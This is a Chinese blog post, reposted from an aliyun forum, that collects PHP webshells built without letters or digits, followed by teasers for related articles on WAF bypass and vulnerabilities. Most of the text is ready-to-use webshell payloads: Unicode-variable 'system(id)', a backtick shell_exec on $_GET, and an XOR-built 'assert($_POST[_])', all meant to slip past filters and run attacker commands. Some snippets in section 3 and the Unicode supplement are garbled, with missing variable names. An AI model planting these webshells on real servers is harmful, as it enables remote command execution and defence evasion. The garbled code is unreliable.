无字母数字webshell进阶收藏版

收藏即为会了!!!!!!

还没有看过P神两篇文章的走这里
一些不包含数字和字母的webshell
无字母数字webshell之提高篇

Unicode码运用

1.原理

P神在他文章中指出:

我们可以使用[].Φ来得到字符串Array.
我们可以得到我们想要的构造payload:

使用说明

- 'ArrayΦ'      <-> [].Φ
-  1            <-> ![]
- 'a'           <-> ([])[![]+![]+![]]
- 'b'           <-> $a = 'a'; $b=++$a;
- 'system'      <-> $η.$ν.$η.$θ.$Ω.$α
- 'system'(id)  <-> system('id')


如图,自己构造可能比较麻烦,直接查照上图,如果需要Unicode码,这里找.

/* system(id) */
<?==([].Φ)[![]+![]+![]]?><?==++#b?><?=$Ψ=++$Χ#c?><?=$Ω=++$Ψ#d?><?=$Ϊ=++$Ω#e?><?=$Ϋ=++$Ϊ#f?><?=$ά=++$Ϋ#g?><?=$έ=++$ά#h?><?=$ή=++$έ#i?><?=$ί=++$ή#j?><?=$ΰ=++$ί#k?><?=$α=++$ΰ#l?><?=$β=++$α#m?><?=$γ=++$β#n?><?=$δ=++$γ#o?><?=$ε=++$δ#p?><?=$ζ=++$ε#q?><?=$η=++$ζ#r?><?=$θ=++$η#s?><?=$ι=++$θ#t?><?=$κ=++$ι#u?><?=$λ=++$κ#v?><?=$μ=++$λ#w?><?=$ν=++$μ#x?><?=$ξ=++$ν#y?><?=$ο=++$ξ#z?><?=$ο=([].Φ)[![]+![]+![]]#a?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>

2.缩短

前面我们依次把字母赋值给不同的Unicode码,现在我们可以只用一个Unicode码遍历所有的字母,然后再取值我们需要的那个值.这样就减少了Unicode码的使用.

# phpinfo()
<?==([].Φ)[![]+![]+![]]#a?><?=++$Φ#b?><?=++$Φ#c?><?=++$Φ#d?><?=++$Φ#e?><?=$α=++$Φ#f?><?=++$Φ#g?><?=$ν=++$Φ#h?><?=$θ=++$Φ#i?><?=++$Φ#j?><?=++$Φ#k?><?=++$Φ#l?><?=++$Φ#m?><?=$Ω=++$Φ#n?><?=$λ=++$Φ#o?><?=$η=++$Φ#p?><?=++$Φ#q?><?=++$Φ#r?><?=++$Φ#s?><?=++$Φ#t?><?=++$Φ#u?><?=++$Φ#v?><?=++$Φ#w?><?=++$Φ#x?><?=++$Φ#y?><?=++$Φ#z?><?=($η.$ν.$η.$θ.$Ω.$α.$λ)()?>

3.压榨

前面我们知道可以使用[].Φ 来得到 字符串Array.用![]+![]+![] 得到字符a,那我们不要a,而使用第一个字符A.

- 'a' <-> ([].Φ)[![]+![]+![]]
- 'A' <-> ([].Φ)['']
<?==([].Φ)['']?><?=++?><?=++?><?=++?><?=++?><?==++?><?=++?><?==++?><?==++?><?=++?><?=++?><?=++?><?=++?><?==++?><?==++?><?==++?><?=++?><?=++?><?=++?><?=++?><?=++?><?=++?><?=++?><?=++?><?=++?><?=++?><?=(......)()?>

补充

1.Unicode补充

<?php
[]=;
=.;
var_dump();#string(10) "ArrayArray"

你懂的!!!

2.数字需要

$Φ=([].Φ)[''];
var_dump($Φ);#string(1) "A"
var_dump(+$Φ);#int(0)

你开心就好!!!

跑题篇

反引号

<?=`{$_GET[_]}`;
#使用十六进制
<?=`{${~"\xa0\xb8\xba\xab"}[~"\xa0"]}`;

我们可以知道

- ~"\xa0\xb8\xba\xab" <-> "_GET"
- ~"\xa0" <-> "_"
- ${"_GET"}[~"\xa0"] <-> $_GET["\xa0"]
- `{$_GET["\xa0"]}` <-> shell_exec($_GET["\xa0"])

然后我们可以使用?_=id
不过,在大佬指点下,也可以有

?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

少了一个反以后,我们可以使用?%a0=id

异或运算

<?=$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);

# $_= '$<>/' ^ '{{{{' ----> $_ = '_GET'
# ${_GET}[_](${_GET})[__];
# final <?=$_GET[_]($_GET[__])

P神文章中是

<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');
// $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);

本文来源于: https://xz.aliyun.com/t/7742

相关推荐

从0学习WebLogic CVE-2020-2551漏洞

最近遇到的实际环境为weblogic,所以这里顺便总结下测2020-2551的一些相关的点 2551也是学习了很多优秀的师傅文章,非常感谢,个人水平较差、文中错误内容还请师傅们指教纠正。 0X00 漏洞利用基础学习 从0开始学习复现这个洞不

一次稍显曲折的爆破经历

拿到手域名一个 cc.test.com 打开后直接就是一个登陆框 随手输入admin准备打密码,提示管理员不存在 说明此处可以爆破用户名,使用字典爆破得到三个用户名 test wangw wangy 登陆抓包密码被md5加密了 使用多账号爆

CSZ CMS 1.2.7 xss分析与复现

CSZ CMS 1.2.7 xss分析与复现 简介 CSZ CMS是一个开源Web应用程序,允许管理网站上的所有内容和设置。CSZ CMS是在Codeigniter3的基础上构建的,并设计了Bootstrap3的结构,这应该使您的网站轻松响

蚁剑改造过WAF系列(一)

Author: lz520520@深蓝攻防实验室 0x00 前言 为什么会有修改蚁剑这个念头呢,之前有朋友对冰蝎做了改造,本来冰蝎就是加密传输,可对抗大多数WAF,但因为有一些弱特征、强特征等,通过流量分析转换成自动化检测,也可以做到冰蝎流

Java 反序列化回显的多种姿势

写在文前 在研究weblogic、fastjson、shiro反序列化漏洞时,多次遇到了回显问题,本文将从以下几种角度出发来分别探讨反序列化回显的问题,也感谢各位师傅们的反序列化回显研究。 defineClass RMI绑定实例 URLCl

蚁剑改造过WAF系列(二)

Author: lz520520@深蓝攻防实验室 0x00 前言 上一篇讲过了编码器和解码器,本篇会讲解蚁剑源码部分,添加asp/aspx解码模块,来实现asp/aspx的加密回显。 0x01 蚁剑源码介绍 大家蚁剑可能用到最多的还是php

代码审计:PbootCMS2.07内核处理缺陷导致的一个前台任意文件包含漏洞分析

挖出来之后看了下官网发现不到半个月之前更新了最新版,下下来之后发现这洞修了..我吐了 干脆直接发出来 分享下思路吧 0x00漏洞分析 漏洞发生在PbootCMS内核的模板解析函数中 为了方便看直接上一个完整的Parser代码吧 public

SaltStack CVE-2020-11651/11652 分析

SaltStack是一种基于C/S架构的服务器基础架构集中管理平台,最近披露出存在两个安全漏洞 CVE-2020-11651 权限缺陷、CVE-2020-11652 任意文件读写漏洞,官方公告SALT 3000.2 RELEASE NOTE

SSTI模板注入(Python+Jinja2)

cl4y@星盟 [toc] SSTI模板注入(Python+Jinja2) 之前有做过一些SSTI的ctf,但是没有系统的学习,今天来总结一下。 前提知识 python、flask、jinja2 SSTI介绍 ssti主要为python的一

蚁剑改造过WAF系列(三)

Author: lz520520@深蓝攻防实验室 0x00 前言 前两篇从蚁剑的介绍,编解码器的功能讲解,到源码分析和解码器的改造,其实已经实现了大部分流量的加密传输,只要在设计一个简单的加密算法即可,比如异或算法,用字符串和key做异或即

一次敏感信息泄露引发的逻辑漏洞挖掘

根据手头上的信息,最大化的利用,一次简单的漏洞挖掘,感觉过程很有意思分享一下~ 0x01初始 收集子域,也是渗透的初始。这里我只是简单用了fofa发现了该公司用来管理合作的一些子域名然后发现是登录管理页面,深入然后发现很多的敏感信息。也是从